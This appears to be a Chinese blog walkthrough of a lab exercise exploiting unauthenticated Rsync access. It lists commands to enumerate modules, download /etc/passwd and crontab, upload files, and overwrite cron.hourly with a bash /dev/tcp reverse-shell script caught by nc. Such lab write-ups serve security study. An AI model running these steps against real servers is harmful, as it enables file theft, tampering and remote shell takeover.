应用协议安全:Rsync-common 未授权访问.

应用协议安全:Rsync-common 未授权访问.

Rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配置 ACL 或访问密码,我们将可以读写目标服务器文件。


目录:

[应用协议安全:Rsync-common 未授权访问.](#应用协议安全:Rsync-common 未授权访问.)

[Rsync-common 未授权访问](#Rsync-common 未授权访问)

[靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客](#靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客)

漏洞的测试:

第一步:测试漏洞有没有存在.

[第二步:测试 读取文件.](#第二步:测试 读取文件.)

[第三步:测试 下载文件.](#第三步:测试 下载文件.)

[第四步:测试 上传文件.](#第四步:测试 上传文件.)

[第五步:测试 反弹 shell](#第五步:测试 反弹 shell)


Rsync-common 未授权访问

靶场准备: Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客


漏洞的测试:

第一步:测试漏洞有没有存在.

复制代码
rsync rsync://172.16.10.130:10890

rsync rsync://测试 IP 地址:端口

第二步:测试 读取文件.

复制代码
rsync rsync://172.16.10.130:55803/src/

第三步:测试 下载文件.

复制代码
rsync rsync://172.16.10.130:10890/src/etc/passwd ./

rsync rsync://测试 IP 地址:端口/src/etc/passwd 下载到这个文件路径下

第四步:测试 上传文件.

复制代码
rsync -av passwd rsync://172.16.10.130:10890/src/tmp/passwd 

rsync -av 要上传文件 rsync://172.16.10.130:10890/路径/

rsync rsync://172.16.10.130:10890/src/tmp/passwd      #读取的文件.

第五步:测试 反弹 shell

前提条件先了解:Crontab是一种运行于 Linux系统 下的定时任务管理器。它可以在指定时间执行特定的命令或脚本,并且可以设置重复周期.

复制代码
直接下载 crontab 文件:

rsync rsync://172.16.10.130:10890/src/etc/crontab /root/bgxg.txt


所以知道他17分钟后执行这个文件,我们就可以创建一个反弹shell的文件来替换他.


复制代码
touch bgxg        #创建新文件.

vim bgxg          #编辑文件.

#添加在文件中的内容
/bin/bash -i >& /dev/tcp/172.16.10.130/5566 0>&1

chmod +x bgxg     #添加权限.


复制代码
再进行上传bgxg文件,把cron.hourly替换了

rsync -av bgxg rsync://172.16.10.130:55790/src/etc/cron.hourly


复制代码
监听这个端口就等着反弹就好.(由于靶场时间比较短,就不等反弹时间了)

nc -lvvp 5566

学习链接:第57天:服务攻防-应用协议_Rsync_SSH_RDP_FTP_漏洞批扫_口令猜解_哔哩哔哩_bilibili

相关推荐
HackTwoHub1 小时前
AI大模型网关存在SQL注入、附 POC 复现、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)
数据库·人工智能·sql·网络安全·系统安全·网络攻击模型·安全架构
wuminyu2 小时前
专家视角看Java字节码加载与存储指令机制
java·linux·c语言·jvm·c++
其实防守也摸鱼2 小时前
CTF密码学综合教学指南--第五章
开发语言·网络·笔记·python·安全·网络安全·密码学
.小小陈.2 小时前
Linux 线程概念与控制:从底层原理到实战应用
linux·运维·jvm
网络工程小王2 小时前
【LangChain 大模型6大调用指南】调用大模型篇
linux·运维·服务器·人工智能·学习
wangbing11252 小时前
各linux版本的包管理命令
linux·运维·服务器
Joseph Cooper3 小时前
Linux/Android 跟踪技术:ftrace、TRACE_EVENT、atrace、systrace 与 perfetto 入门
android·linux·运维
S1998_1997111609•X3 小时前
论mysql国盾shell-sfa犯罪行为集团下的分项工程及反向注入原理尐深度纳米算法下的鐌檵鄐鉎行为
网络·数据库·网络协议·百度·开闭原则
比昨天多敲两行4 小时前
Linux基础开发工具(下)
linux·运维·服务器
AI精钢4 小时前
AI Agent 从上线到删库跑路始末
网络·人工智能·云原生·aigc